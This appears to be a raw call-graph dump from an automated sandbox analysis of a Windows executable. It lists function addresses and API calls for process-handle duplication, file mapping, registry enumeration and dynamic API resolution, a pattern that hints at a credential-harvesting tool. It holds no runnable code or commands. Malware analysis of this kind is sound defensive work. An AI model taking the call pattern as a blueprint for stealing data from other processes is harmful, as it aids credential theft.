??3@YAXPAX 39023->39025 39024->39023 39026 40e5bb 39025->39026 39028 40e5c4 CloseHandle 39026->39028 39029 40e5cc 39026->39029 39028->39029 39031 40b633 ??3@YAXPAX 39029->39031 39030 40e573 39032 40e584 39030->39032 39033 40e57c FindCloseChangeNotification 39030->39033 39034 40e5db 39031->39034 39084 40b1ab ??3@YAXPAX ??3@YAXPAX 39032->39084 39033->39032 39037 40b633 ??3@YAXPAX 39034->39037 39036 40e540 39036->39030 39083 40e2ab 30 API calls 39036->39083 39038 40e5e3 39037->39038 39038->39014 39041 406214 22 API calls 39040->39041 39042 40e03c 39041->39042 39043 40e16b 39042->39043 39044 40dd85 75 API calls 39042->39044 39043->39022 39045 40e06b 39044->39045 39045->39043 39046 40afcf ??2@YAPAXI ??3@YAXPAX 39045->39046 39047 40e08d OpenProcess 39046->39047 39048 40e0a4 GetCurrentProcess DuplicateHandle 39047->39048 39052 40e152 39047->39052 39049 40e0d0 GetFileSize 39048->39049 39050 40e14a CloseHandle 39048->39050 39053 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39049->39053 39050->39052 39051 40e160 39055 40b04b ??3@YAXPAX 39051->39055 39052->39051 39054 406214 22 API calls 39052->39054 39056 40e0ea 39053->39056 39054->39051 39055->39043 39057 4096dc CreateFileW 39056->39057 39058 40e0f1 CreateFileMappingW 39057->39058 39059 40e140 CloseHandle CloseHandle 39058->39059 39060 40e10b MapViewOfFile 39058->39060 39059->39050 39061 40e13b FindCloseChangeNotification 39060->39061 39062 40e11f WriteFile UnmapViewOfFile 39060->39062 39061->39059 39062->39061 39064 40e18c 39063->39064 39065 406b90 11 API calls 39064->39065 39066 40e19f 39065->39066 39067 40e1a7 memset 39066->39067 39068 40e299 39066->39068 39073 40e1e8 39067->39073 39069 4069a3 ??3@YAXPAX ??3@YAXPAX 39068->39069 39070 40e2a4 39069->39070 39070->39036 39071 406e8f 13 API calls 39071->39073 39072 406b53 SetFilePointerEx ReadFile 39072->39073 39073->39071 39073->39072 39074 40e283 39073->39074 39075 40dd50 _wcsicmp 39073->39075 39079 40742e 8 API calls 39073->39079 39080 40aae3 wcslen wcslen _memicmp 39073->39080 39081 40e244 _snwprintf 39073->39081 39076 40e291 39074->39076 39077 40e288 ??3@YAXPAX 39074->39077 39075->39073 39078 40aa04 ??3@YAXPAX 39076->39078 39077->39076 39078->39068 39079->39073 39080->39073 39082 40a8d0 7 API calls 39081->39082 39082->39073 39083->39036 39084->39021 39087 40a980 39085->39087 39086 40a8bb 39086->38946 39086->38947 39087->39086 39088 40a995 _wcsicmp 39087->39088 39089 40a99c wcscmp 39087->39089 39088->39087 39089->39087 39090->38950 39091->38954 39093 40aa23 RegEnumValueW 39092->39093 39093->38961 39093->38962 39095 405335 39094->39095 39096 40522a 39094->39096 39095->38540 39097 40b2cc 27 API calls 39096->39097 39098 405234 39097->39098 39099 40a804 8 API calls 39098->39099 39100 40523a 39099->39100 39139 40b273 39100->39139 39102 405248 _mbscpy _mbscat GetProcAddress 39103 40b273 27 API calls 39102->39103 39104 405279 39103->39104 39142 405211 GetProcAddress 39104->39142 39106 405282 39107 40b273 27 API calls 39106->39107 39108 40528f 39107->39108 39143 405211 GetProcAddress 39108->39143 39110 405298 39111 40b273 27 API calls 39110->39111 39112 4052a5 39111->39112 39144 405211 GetProcAddress 39112->39144 39114 4052ae 39115 40b273 27 API calls 39114->39115 39116 4052bb 39115->39116 39145 405211 GetProcAddress 39116->39145 39118 4052c4 39119 40b273 27 API calls 39118->39119 39120 4052d1 39119->39120 39146 405211 GetProcAddress 39120->39146 39122 4052da 39123 40b273 27 API calls 39122->39123 39124 4052e7 39123->39124 39147 405211 GetProcAddress 39124->39147 39126 4052f0 39127 40b273 27 API calls 39126->39127 39128 4052fd 39127->39128 39148 405211 GetProcAddress 39128->39148 39130 405306 39131 40b273 27 API calls 39130->39131 39132 405313 39131->39132 39149 405211 GetProcAddress 39132->39149 39134 40531c 39135 40b273 27 API calls 39134->39135 39136 405329 39135->39136 39150 405211 GetProcAddress 39136->39150 39138 405332 39138->39095 39140 40b58d 27 API calls 39139->39140 39141 40b18c 39140->39141 39141->39102 39142->39106 39143->39110 39144->39114 39145->39118 39146->39122 39147->39126 39148->39130 39149->39134 39150->39138 39152 405220 39 API calls 39151->39152 39153 405369 39152->39153 39153->38979 39153->38980 39154->38982 39155->38986 39156->38983 39157->38980 39159 40440c FreeLibrary 39158->39159 39160 40436d 39159->39160 39161 40a804 8 API calls 39160->39161 39162 404377 39161->39162 39163 404383 39162->39163 39164 404405 39162->39164 39165 40b273 27 API calls 39163->39165 39164->38552 39164->38554 39164->38555 39166 40438d GetProcAddress 39165->39166 39167 40b273 27 API calls 39166->39167 39168 4043a7 GetProcAddress 39167->39168 39169 40b273 27 API calls 39168->39169 39170 4043ba GetProcAddress 39169->39170 39171 40b273 27 API calls 39170->39171 39172 4043ce GetProcAddress 39171->39172 39173 40b273 27 API calls 39172->39173 39174 4043e2 GetProcAddress 39173->39174 39175 4043f1 39174->39175 39176 4043f7 39175->39176 39177 40440c FreeLibrary 39175->39177 39176->39164 39177->39164 39179 404413 FreeLibrary 39178->39179 39180 40441e 39178->39180 39179->39180 39180->38569 39181->38560 39183 40442e 39182->39183 39184 40447e 39182->39184 39185 40b2cc 27 API calls 39183->39185 39184->38560 39186 404438 39185->39186 39187 40a804 8 API calls 39186->39187 39188 40443e 39187->39188 39189 404445 39188->39189 39190 404467 39188->39190 39191 40b273 27 API calls 39189->39191 39190->39184 39192 404475 FreeLibrary 39190->39192 39193 40444f GetProcAddress 39191->39193 39192->39184 39193->39190 39194 404460 39193->39194 39194->39190 39196 4135f6 39195->39196 39197 4135eb FreeLibrary 39195->39197 39196->38572 39197->39196 39199 4449c4 39198->39199 39200 444a52 39198->39200 39201 40b2cc 27 API calls 39199->39201 39200->38589 39200->38590 39202 4449cb 39201->39202 39203 40a804 8 API calls 39202->39203 39204 4449d1 39203->39204 39205 40b273 27 API calls 39204->39205 39206 4449dc GetProcAddress 39205->39206 39207 40b273 27 API calls 39206->39207 39208 4449f3 GetProcAddress 39207->39208 39209 40b273 27 API calls 39208->39209 39210 444a04 GetProcAddress 39209->39210 39211 40b273 27 API calls 39210->39211 39212 444a15 GetProcAddress 39211->39212 39213 40b273 27 API calls 39212->39213 39214 444a26 GetProcAddress 39213->39214 39215 40b273 27 API calls 39214->39215 39216 444a37 GetProcAddress 39215->39216 39217 40b273 27 API calls 39216->39217 39218 444a48 GetProcAddress 39217->39218 39218->39200 39219->38600 39220->38600 39221->38600 39222->38600 39223->38591 39225 403a29 39224->39225 39239 403bed memset memset 39225->39239 39227 403ae7 39252 40b1ab ??3@YAXPAX ??3@YAXPAX 39227->39252 39228 403a3f memset 39234 403a2f 39228->39234 39230 403aef 39230->38608 39231 409b98 GetFileAttributesW 39231->39234 39232 40a8d0 7 API calls 39232->39234 39233 409d1f 6 API calls 39233->39234 39234->39227 39234->39228 39234->39231 39234->39232 39234->39233 39236 40a051 GetFileTime FindCloseChangeNotification 39235->39236 39237 4039ca CompareFileTime 39235->39237 39236->39237 39237->38608 39238->38607 39240 414c2e 16 API calls 39239->39240 39241 403c38 39240->39241 39242 409719 2 API calls 39241->39242 39243 403c3f wcscat 39242->39243 39244 414c2e 16 API calls 39243->39244 39245 403c61 39244->39245 39246 409719 2 API calls 39245->39246 39247 403c68 wcscat 39246->39247 39253 403af5 39247->39253 39250 403af5 20 API calls 39251 403c95 39250->39251 39251->39234 39252->39230 39254 403b02 39253->39254 39255 40ae18 9 API calls 39254->39255 39263 403b37 39255->39263 39256 403bdb 39258 40aebe FindClose 39256->39258 39257 40add4 wcscmp wcscmp 39257->39263 39259 403be6 39258->39259 39259->39250 39260 40ae18 9 API calls 39260->39263 39261 40ae51 9 API calls 39261->39263 39262 40aebe FindClose 39262->39263 39263->39256 39263->39257 39263->39260 39263->39261 39263->39262 39264 40a8d0 7 API calls 39263->39264 39264->39263 39266 409d1f 6 API calls 39265->39266 39267 404190 39266->39267 39280 409b98 GetFileAttributesW 39267->39280 39269 40419c 39270 4041a7 6 API calls 39269->39270 39271 40435c 39269->39271 39273 40424f 39270->39273 39271->38634 39273->39271 39274 40425e memset 39273->39274 39276 409d1f 6 API calls 39273->39276 39277 40a8ab 9 API calls 39273->39277 39281 414842 39273->39281 39274->39273 39275 404296 wcscpy 39274->39275 39275->39273 39276->39273 39278 4042b6 memset memset _snwprintf wcscpy 39277->39278 39278->39273 39279->38632 39280->39269 39284 41443e 39281->39284 39283 414866 39283->39273 39285 41444b 39284->39285 39286 414451 39285->39286 39287 4144a3 GetPrivateProfileStringW 39285->39287 39288 414491 39286->39288 39289 414455 wcschr 39286->39289 39287->39283 39291 414495 WritePrivateProfileStringW 39288->39291 39289->39288 39290 414463 _snwprintf 39289->39290 39290->39291 39291->39283 39292->38638 39294 40b2cc 27 API calls 39293->39294 39295 409615 39294->39295 39296 409d1f 6 API calls 39295->39296 39297 409625 39296->39297 39322 409b98 GetFileAttributesW 39297->39322 39299 409634 39300 409648 39299->39300 39323 4091b8 memset 39299->39323 39302 40b2cc 27 API calls 39300->39302 39304 408801 39300->39304 39303 40965d 39302->39303 39305 409d1f 6 API calls 39303->39305 39304->38641 39304->38642 39306 40966d 39305->39306 39375 409b98 GetFileAttributesW 39306->39375 39308 40967c 39308->39304 39309 409681 39308->39309 39376 409529 72 API calls 39309->39376 39311 409690 39311->39304 39312->38664 39313->38641 39314->38669 39322->39299 39377 40a6e6 WideCharToMultiByte 39323->39377 39325 409202 39378 444432 39325->39378 39328 40b273 27 API calls 39329 409236 39328->39329 39424 438552 39329->39424 39332 409383 39334 40b273 27 API calls 39332->39334 39336 409399 39334->39336 39335 409254 39337 40937b 39335->39337 39445 4253cf 17 API calls 39335->39445 39338 438552 134 API calls 39336->39338 39449 424f26 123 API calls 39337->39449 39356 4093a3 39338->39356 39341 409267 39342 4094ff 39453 443d90 39342->39453 39345 4251c4 137 API calls 39345->39356 39347 409507 39355 40951d 39347->39355 39473 408f2f 77 API calls 39347->39473 39349 4093df 39452 424f26 123 API calls 39349->39452 39353 4253cf 17 API calls 39353->39356 39355->39300 39356->39342 39356->39345 39356->39349 39356->39353 39358 4093e4 39356->39358 39450 4253af 17 API calls 39358->39450 39365 4093ed 39451 4253af 17 API calls 39365->39451 39368 4093f9 39368->39349 39369 409409 memcmp 39368->39369 39369->39349 39370 409421 memcmp 39369->39370 39375->39308 39376->39311 39377->39325 39474 4438b5 39378->39474 39380 44444c 39386 409215 39380->39386 39488 415a6d 39380->39488 39382 4442e6 11 API calls 39384 44469e 39382->39384 39383 444486 39385 4444b9 memcpy 39383->39385 39423 4444a4 39383->39423 39384->39386 39388 443d90 111 API calls 39384->39388 39492 415258 39385->39492 39386->39328 39386->39355 39388->39386 39389 444524 39390 444541 39389->39390 39391 44452a 39389->39391 39495 444316 39390->39495 39392 416935 16 API calls 39391->39392 39392->39423 39395 444316 18 API calls 39396 444563 39395->39396 39397 444316 18 API calls 39396->39397 39398 44456f 39397->39398 39399 444316 18 API calls 39398->39399 39400 44457f 39399->39400 39400->39423 39509 432d4e 39400->39509 39423->39382 39562 438460 39424->39562 39426 409240 39426->39332 39427 4251c4 39426->39427 39574 424f07 39427->39574 39429 4251e4 39430 4251f7 39429->39430 39431 4251e8 39429->39431 39582 4250f8 39430->39582 39581 4446ea 11 API calls 39431->39581 39433 4251f2 39433->39335 39435 425209 39441 4250f8 127 API calls 39435->39441 39441->39435 39445->39341 39449->39332 39450->39365 39451->39368 39452->39342 39454 443da3 39453->39454 39455 443db6 39453->39455 39598 41707a 39454->39598 39455->39347 39457 443da8 39458 443dbc 39457->39458 39459 443dac 39457->39459 39473->39355 39475 4438d0 39474->39475 39485 4438c9 39474->39485 39476 415378 memcpy memcpy 39475->39476 39477 4438d5 39476->39477 39478 4154e2 10 API calls 39477->39478 39479 443906 39477->39479 39477->39485 39478->39479 39480 443970 memset 39479->39480 39479->39485 39483 44398b 39480->39483 39481 4439a0 39482 415700 10 API calls 39481->39482 39481->39485 39486 4439c0 39482->39486 39483->39481 39484 41975c 10 API calls 39483->39484 39484->39481 39485->39380 39486->39485 39487 418981 10 API calls 39486->39487 39487->39485 39489 415a77 39488->39489 39490 415a8d 39489->39490 39491 415a7e memset 39489->39491 39490->39383 39491->39490 39493 4438b5 11 API calls 39492->39493 39494 41525d 39493->39494 39494->39389 39496 444328 39495->39496 39497 444423 39496->39497 39498 44434e 39496->39498 39499 4446ea 11 API calls 39497->39499 39500 432d4e memset memset memcpy 39498->39500 39506 444381 39499->39506 39501 44435a 39500->39501 39503 444375 39501->39503 39508 44438b 39501->39508 39502 432d4e memset memset memcpy 39504 4443ec 39502->39504 39505 416935 16 API calls 39503->39505 39504->39506 39507 416935 16 API calls 39504->39507 39505->39506 39506->39395 39507->39506 39508->39502 39510 432d65 39509->39510 39511 432d58 39509->39511 39563 41703f 11 API calls 39562->39563 39564 43847a 39563->39564 39565 43848a 39564->39565 39566 43847e 39564->39566 39568 438270 134 API calls 39565->39568 39567 4446ea 11 API calls 39566->39567 39570 438488 39567->39570 39569 4384aa 39568->39569 39569->39570 39571 424f26 123 API calls 39569->39571 39570->39426 39572 4384bb 39571->39572 39573 438270 134 API calls 39572->39573 39573->39570 39575 424f1f 39574->39575 39576 424f0c 39574->39576 39578 424eea 11 API calls 39575->39578 39577 416760 11 API calls 39576->39577 39579 424f18 39577->39579 39580 424f24 39578->39580 39579->39429 39580->39429 39581->39433 39583 425108 39582->39583 39589 42510d 39582->39589 39584 424f74 124 API calls 39583->39584 39584->39589 39585 42569b 125 API calls 39586 42516e 39585->39586 39588 415c7d 16 API calls 39586->39588 39587 425115 39587->39435 39588->39587 39589->39585 39589->39587 39599 417085 39598->39599 39600 4170ab 39598->39600 39599->39600 39601 416760 11 API calls 39599->39601 39600->39457 39602 4170a4 39601->39602 39602->39457 39641 413f4f 39614->39641 39617 413f37 K32GetModuleFileNameExW 39618 413f4a 39617->39618 39618->38696 39620 413969 wcscpy 39619->39620 39621 41396c wcschr 39619->39621 39633 413a3a 39620->39633 39621->39620 39623 41398e 39621->39623 39646 4097f7 wcslen wcslen _memicmp 39623->39646 39625 41399a 39626 4139a4 memset 39625->39626 39627 4139e6 39625->39627 39647 409dd5 GetWindowsDirectoryW wcscpy 39626->39647 39629 413a31 wcscpy 39627->39629 39630 4139ec memset 39627->39630 39629->39633 39648 409dd5 GetWindowsDirectoryW wcscpy 39630->39648 39631 4139c9 wcscpy wcscat 39631->39633 39633->38696 39634 413a11 memcpy wcscat 39634->39633 39636 413cb0 GetModuleHandleW 39635->39636 39637 413cda 39635->39637 39636->39637 39638 413cbf GetProcAddress 39636->39638 39639 413ce3 GetProcessTimes 39637->39639 39640 413cf6 39637->39640 39638->39637 39639->38704 39640->38704 39642 413f2f 39641->39642 39643 413f54 39641->39643 39642->39617 39642->39618 39644 40a804 8 API calls 39643->39644 39645 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39644->39645 39645->39642 39646->39625 39647->39631 39648->39634 39649->38725 39650->38748 39652 409cf9 GetVersionExW 39651->39652 39653 409d0a 39651->39653 39652->39653 39653->38754 39653->38758 39654->38760 39655->38763 39656->38765 39657->38830 39659 40bba5 39658->39659 39706 40cc26 39659->39706 39662 40bd4b 39727 40cc0c 39662->39727 39667 40b2cc 27 API calls 39668 40bbef 39667->39668 39734 40ccf0 _wcsicmp 39668->39734 39670 40bbf5 39670->39662 39735 40ccb4 6 API calls 39670->39735 39672 40bc26 39673 40cf04 17 API calls 39672->39673 39674 40bc2e 39673->39674 39675 40bd43 39674->39675 39676 40b2cc 27 API calls 39674->39676 39677 40cc0c 4 API calls 39675->39677 39678 40bc40 39676->39678 39677->39662 39736 40ccf0 _wcsicmp 39678->39736 39680 40bc46 39680->39675 39681 40bc61 memset memset WideCharToMultiByte 39680->39681 39737 40103c strlen 39681->39737 39683 40bcc0 39684 40b273 27 API calls 39683->39684 39685 40bcd0 memcmp 39684->39685 39685->39675 39686 40bce2 39685->39686 39687 404423 37 API calls 39686->39687 39688 40bd10 39687->39688 39688->39675 39689 40bd3a LocalFree 39688->39689 39690 40bd1f memcpy 39688->39690 39689->39675 39690->39689 39692 409a74 GetTempFileNameW 39691->39692 39693 409a66 GetWindowsDirectoryW 39691->39693 39692->38844 39693->39692 39694->38845 39695->38882 39696->38882 39697->38882 39698->38882 39699->38882 39700->38882 39701->38882 39702->38882 39703->38882 39704->38857 39705->38879 39738 4096c3 CreateFileW 39706->39738 39708 40cc34 39709 40cc3d GetFileSize 39708->39709 39717 40bbca 39708->39717 39710 40afcf 2 API calls 39709->39710 39711 40cc64 39710->39711 39739 40a2ef ReadFile 39711->39739 39713 40cc71 39740 40ab4a MultiByteToWideChar 39713->39740 39715 40cc95 FindCloseChangeNotification 39716 40b04b ??3@YAXPAX 39715->39716 39716->39717 39717->39662 39718 40cf04 39717->39718 39719 40b633 ??3@YAXPAX 39718->39719 39720 40cf14 39719->39720 39746 40b1ab ??3@YAXPAX ??3@YAXPAX 39720->39746 39722 40bbdd 39722->39662 39722->39667 39723 40cf1b 39723->39722 39725 40cfef 39723->39725 39747 40cd4b 39723->39747 39726 40cd4b 14 API calls 39725->39726 39726->39722 39728 40b633 ??3@YAXPAX 39727->39728 39729 40cc15 39728->39729 39730 40aa04 ??3@YAXPAX 39729->39730 39731 40cc1d 39730->39731 39796 40b1ab ??3@YAXPAX ??3@YAXPAX 39731->39796 39733 40b7d4 memset CreateFileW 39733->38837 39733->38838 39734->39670 39735->39672 39736->39680 39737->39683 39738->39708 39739->39713 39741 40ab6b 39740->39741 39745 40ab93 39740->39745 39742 40a9ce 4 API calls 39741->39742 39743 40ab74 39742->39743 39744 40ab7c MultiByteToWideChar 39743->39744 39744->39745 39745->39715 39746->39723 39748 40cd7b 39747->39748 39781 40aa29 39748->39781 39750 40cef5 39751 40aa04 ??3@YAXPAX 39750->39751 39752 40cefd 39751->39752 39752->39723 39754 40aa29 6 API calls 39755 40ce1d 39754->39755 39756 40aa29 6 API calls 39755->39756 39757 40ce3e 39756->39757 39758 40ce6a 39757->39758 39789 40abb7 wcslen memmove 39757->39789 39759 40ce9f 39758->39759 39792 40abb7 wcslen memmove 39758->39792 39761 40a8d0 7 API calls 39759->39761 39765 40ceb5 39761->39765 39762 40ce56 39790 40aa71 wcslen 39762->39790 39764 40ce8b 39793 40aa71 wcslen 39764->39793 39771 40a8d0 7 API calls 39765->39771 39768 40ce5e 39791 40abb7 wcslen memmove 39768->39791 39769 40ce93 39794 40abb7 wcslen memmove 39769->39794 39773 40cecb 39771->39773 39795 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39773->39795 39775 40cedd 39776 40aa04 ??3@YAXPAX 39775->39776 39777 40cee5 39776->39777 39778 40aa04 ??3@YAXPAX 39777->39778 39779 40ceed 39778->39779 39780 40aa04 ??3@YAXPAX 39779->39780 39780->39750 39782 40aa33 39781->39782 39783 40aa63 39781->39783 39784 40aa44 39782->39784 39785 40aa38 wcslen 39782->39785 39783->39750 39783->39754 39786 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39784->39786 39785->39784 39787 40aa4d 39786->39787 39787->39783 39788 40aa51 memcpy 39787->39788 39788->39783 39789->39762 39790->39768 39791->39758 39792->39764 39793->39769 39794->39759 39795->39775 39796->39733 39797->38897 39798->38905 39808 44def7 39809 44df07 39808->39809 39810 44df00 ??3@YAXPAX 39808->39810 39811 44df17 39809->39811 39812 44df10 ??3@YAXPAX 39809->39812 39810->39809 39813 44df27 39811->39813 39814 44df20 ??3@YAXPAX 39811->39814 39812->39811 39815 44df37 39813->39815 39816 44df30 ??3@YAXPAX 39813->39816 39814->39813 39816->39815 37668 44dea5 37669 44deb5 FreeLibrary 37668->37669 37670 44dec3 37668->37670 37669->37670 39817 4148b6 FindResourceW 39818 4148f9 39817->39818 39819 4148cf SizeofResource 39817->39819 39819->39818 39820 4148e0 LoadResource 39819->39820 39820->39818 39821 4148ee LockResource 39820->39821 39821->39818 37844 415304 ??3@YAXPAX 39822 441b3f 39832 43a9f6 39822->39832 39824 441b61 40005 4386af memset 39824->40005 39826 44189a 39827 4418e2 39826->39827 39831 442bd4 39826->39831 39829 4418ea 39827->39829 40006 4414a9 12 API calls 39827->40006 39831->39829 40007 441409 memset 39831->40007 39833 43aa20 39832->39833 39834 43aadf 39832->39834 39833->39834 39835 43aa34 memset 39833->39835 39834->39824 39836 43aa56 39835->39836 39837 43aa4d 39835->39837 40008 43a6e7 39836->40008 40016 42c02e memset 39837->40016 39842 43aad3 40018 4169a7 11 API calls 39842->40018 39843 43aaae 39843->39834 39843->39842 39858 43aae5 39843->39858 39844 43ac18 39847 43ac47 39844->39847 40020 42bbd5 memcpy memcpy memcpy memset memcpy 39844->40020 39848 43aca8 39847->39848 40021 438eed 16 API calls 39847->40021 39852 43acd5 39848->39852 40023 4233ae 11 API calls 39848->40023 39851 43ac87 40022 4233c5 16 API calls 39851->40022 40024 423426 11 API calls 39852->40024 39856 43ace1 40025 439811 163 API calls 39856->40025 39857 43a9f6 161 API calls 39857->39858 39858->39834 39858->39844 39858->39857 40019 439bbb 22 API calls 39858->40019 39860 43acfd 39865 43ad2c 39860->39865 40026 438eed 16 API calls 39860->40026 39862 43ad19 40027 4233c5 16 API calls 39862->40027 39864 43ad58 40028 44081d 163 API calls 39864->40028 39865->39864 39868 43add9 39865->39868 40032 423426 11 API calls 39868->40032 39869 43ae3a memset 39870 43ae73 39869->39870 40033 42e1c0 147 API calls 39870->40033 39871 43adab 40030 438c4e 163 API calls 39871->40030 39872 43ad6c 39872->39834 39872->39871 40029 42370b memset memcpy memset 39872->40029 39876 43adcc 40031 440f84 12 API calls 39876->40031 39877 43ae96 40034 42e1c0 147 API calls 39877->40034 39880 43aea8 39881 43aec1 39880->39881 40035 42e199 147 API calls 39880->40035 39883 43af00 39881->39883 40036 42e1c0 147 API calls 39881->40036 39883->39834 39886 43af1a 39883->39886 39887 43b3d9 39883->39887 40037 438eed 16 API calls 39886->40037 39892 43b3f6 39887->39892 39893 43b4c8 39887->39893 39888 43b60f 39888->39834 40096 4393a5 17 API calls 39888->40096 39891 43af2f 40038 4233c5 16 API calls 39891->40038 40078 432878 12 API calls 39892->40078 39903 43b4f2 39893->39903 40084 42bbd5 memcpy memcpy memcpy memset memcpy 39893->40084 39895 43af51 40039 423426 11 API calls 39895->40039 39898 43af7d 40040 423426 11 API calls 39898->40040 39902 43af94 40041 423330 11 API calls 39902->40041 40085 43a76c 21 API calls 39903->40085 39904 43b529 40086 44081d 163 API calls 39904->40086 39905 43b462 40080 423330 11 API calls 39905->40080 39909 43b428 39909->39905 40079 432b60 16 API calls 39909->40079 39910 43afca 40042 423330 11 API calls 39910->40042 39911 43b47e 39915 43b497 39911->39915 40081 42374a memcpy memset memcpy memcpy memcpy 39911->40081 39912 43b544 39913 43b55c 39912->39913 40087 42c02e memset 39912->40087 40088 43a87a 163 API calls 39913->40088 40082 4233ae 11 API calls 39915->40082 39917 43afdb 40043 4233ae 11 API calls 39917->40043 39921 43b4b1 40083 423399 11 API calls 39921->40083 39923 43b56c 39926 43b58a 39923->39926 40089 423330 11 API calls 39923->40089 39925 43afee 40044 44081d 163 API calls 39925->40044 40090 440f84 12 API calls 39926->40090 39927 43b4c1 40092 42db80 163 API calls 39927->40092 39932 43b592 40091 43a82f 16 API calls 39932->40091 39935 43b5b4 40093 438c4e 163 API calls 39935->40093 39937 43b5cf 40094 42c02e memset 39937->40094 39939 43b005 39939->39834 39944 43b01f 39939->39944 40045 42d836 163 API calls 39939->40045 39940 43b1ef 40055 4233c5 16 API calls 39940->40055 39942 43b212 40056 423330 11 API calls 39942->40056 39944->39940 40053 423330 11 API calls 39944->40053 40054 42d71d 163 API calls 39944->40054 39946 43b087 40046 4233ae 11 API calls 39946->40046 39947 43add4 39947->39888 40095 438f86 16 API calls 39947->40095 39950 43b22a 40057 42ccb5 11 API calls 39950->40057 39953 43b23f 40058 4233ae 11 API calls 39953->40058 39954 43b10f 40049 423330 11 API calls 39954->40049 39956 43b257 40059 4233ae 11 API calls 39956->40059 39960 43b129 40050 4233ae 11 API calls 39960->40050 39961 43b26e 40060 4233ae 11 API calls 39961->40060 39964 43b09a 39964->39954 40047 42cc15 19 API calls 39964->40047 40048 4233ae 11 API calls 39964->40048 39965 43b282 40061 43a87a 163 API calls 39965->40061 39967 43b13c 40051 440f84 12 API calls 39967->40051 39969 43b29d 40062 423330 11 API calls 39969->40062 39972 43b2af 39975 43b2b8 39972->39975 39976 43b2ce 39972->39976 39973 43b15f 40052 4233ae 11 API calls 39973->40052 40063 4233ae 11 API calls 39975->40063 40064 440f84 12 API calls 39976->40064 39979 43b2c9 40066 4233ae 11 API calls 39979->40066 39980 43b2da 40065 42370b memset memcpy memset 39980->40065 39983 43b2f9 40067 423330 11 API calls 39983->40067 39985 43b30b 40068 423330 11 API calls 39985->40068 39987 43b325 40069 423399 11 API calls 39987->40069 39989 43b332 40070 4233ae 11 API calls 39989->40070 39991 43b354 40071 423399 11 API calls 39991->40071 39993 43b364 40072 43a82f 16 API calls 39993->40072 39995 43b370 40073 42db80 163 API calls 39995->40073 39997 43b380 40074 438c4e 163 API calls 39997->40074 39999 43b39e 40075 423399 11 API calls 39999->40075 40001 43b3ae 40076 43a76c 21 API calls 40001->40076 40003 43b3c3 40077 423399 11 API calls 40003->40077 40005->39826 40006->39829 40007->39831 40009 43a6f5 40008->40009 40011 43a765 40008->40011 40009->40011 40097 42a115 40009->40097 40011->39834 40017 4397fd memset 40011->40017 40014 43a73d 40014->40011 40015 42a115 147 API calls 40014->40015 40015->40011 40016->39836 40017->39843 40018->39834 40019->39858 40020->39847 40021->39851 40022->39848 40023->39852 40024->39856 40025->39860 40026->39862 40027->39865 40028->39872 40029->39871 40030->39876 40031->39947 40032->39869 40033->39877 40034->39880 40035->39881 40036->39881 40037->39891 40038->39895 40039->39898 40040->39902 40041->39910 40042->39917 40043->39925 40044->39939 40045->39946 40046->39964 40047->39964 40048->39964 40049->39960 40050->39967 40051->39973 40052->39944 40053->39944 40054->39944 40055->39942 40056->39950 40057->39953 40058->39956 40059->39961 40060->39965 40061->39969 40062->39972 40063->39979 40064->39980 40065->39979 40066->39983 40067->39985 40068->39987 40069->39989 40070->39991 40071->39993 40072->39995 40073->39997 40074->39999 40075->40001 40076->40003 40077->39947 40078->39909 40079->39905 40080->39911 40081->39915 40082->39921 40083->39927 40084->39903 40085->39904 40086->39912 40087->39913 40088->39923 40089->39926 40090->39932 40091->39927 40092->39935 40093->39937 40094->39947 40095->39888 40096->39834 40098 42a175 40097->40098 40100 42a122 40097->40100 40098->40011 40103 42b13b 147 API calls 40098->40103 40100->40098 40101 42a115 147 API calls 40100->40101 40104 43a174 40100->40104 40128 42a0a8 147 API calls 40100->40128 40101->40100 40103->40014 40118 43a196 40104->40118 40119 43a19e 40104->40119 40105 43a306 40105->40118 40137 4388c4 14 API calls 40105->40137 40108 42a115 147 API calls 40108->40119 40110 43a642 40110->40118 40158 4169a7 11 API calls 40110->40158 40114 43a635 40157 42c02e memset 40114->40157 40118->40100 40119->40105 40119->40108 40119->40118 40129 42ff8c 40119->40129 40145 415a91 40119->40145 40149 4165ff 40119->40149 40152 439504 13 API calls 40119->40152 40153 4312d0 147 API calls 40119->40153 40154 42be4c memcpy memcpy memcpy memset memcpy 40119->40154 40155 43a121 11 API calls 40119->40155 40121 4169a7 11 API calls 40122 43a325 40121->40122 40122->40110 40122->40114 40122->40118 40122->40121 40123 42b5b5 memset memcpy 40122->40123 40124 42bf4c 14 API calls 40122->40124 40127 4165ff 11 API calls 40122->40127 40138 42b63e 40122->40138 40156 42bfcf memcpy 40122->40156 40123->40122 40124->40122 40127->40122 40128->40100 40159 43817e 40129->40159 40131 42ff99 40132 42ffe3 40131->40132 40133 42ffd0 40131->40133 40136 42ff9d 40131->40136 40164 4169a7 11 API calls 40132->40164 40163 4169a7 11 API calls 40133->40163 40136->40119 40137->40122 40311 42b4ec 40138->40311 40140 42b64c 40317 42b5e4 memset 40140->40317 40142 42b65e 40143 42b66d 40142->40143 40318 42b3c6 11 API calls 40142->40318 40143->40122 40146 415a9d 40145->40146 40147 415ab3 40146->40147 40148 415aa4 memset 40146->40148 40147->40119 40148->40147 40319 4165a0 40149->40319 40152->40119 40153->40119 40154->40119 40155->40119 40156->40122 40157->40110 40158->40118 40160 438187 40159->40160 40162 438192 40159->40162 40165 4380f6 40160->40165 40162->40131 40163->40136 40164->40136 40167 43811f 40165->40167 40166 438164 40166->40162 40167->40166 40169 4300e8 3 API calls 40167->40169 40170 437e5e 40167->40170 40169->40167 40193 437d3c 40170->40193 40172 437eb3 40172->40167 40173 437ea9 40173->40172 40178 437f22 40173->40178 40208 41f432 40173->40208 40176 437f06 40255 415c56 11 API calls 40176->40255 40180 437f7f 40178->40180 40181 432d4e 3 API calls 40178->40181 40179 437f95 40256 415c56 11 API calls 40179->40256 40180->40179 40182 43802b 40180->40182 40181->40180 40184 4165ff 11 API calls 40182->40184 40185 438054 40184->40185 40219 437371 40185->40219 40188 43806b 40189 438094 40188->40189 40257 42f50e 138 API calls 40188->40257 40191 4300e8 3 API calls 40189->40191 40192 437fa3 40189->40192 40191->40192 40192->40172 40258 41f638 104 API calls 40192->40258 40194 437d69 40193->40194 40197 437d80 40193->40197 40259 437ccb 11 API calls 40194->40259 40196 437d76 40196->40173 40197->40196 40198 437da3 40197->40198 40200 437d90 40197->40200 40201 438460 134 API calls 40198->40201 40200->40196 40263 437ccb 11 API calls 40200->40263 40204 437dcb 40201->40204 40202 437de8 40262 424f26 123 API calls 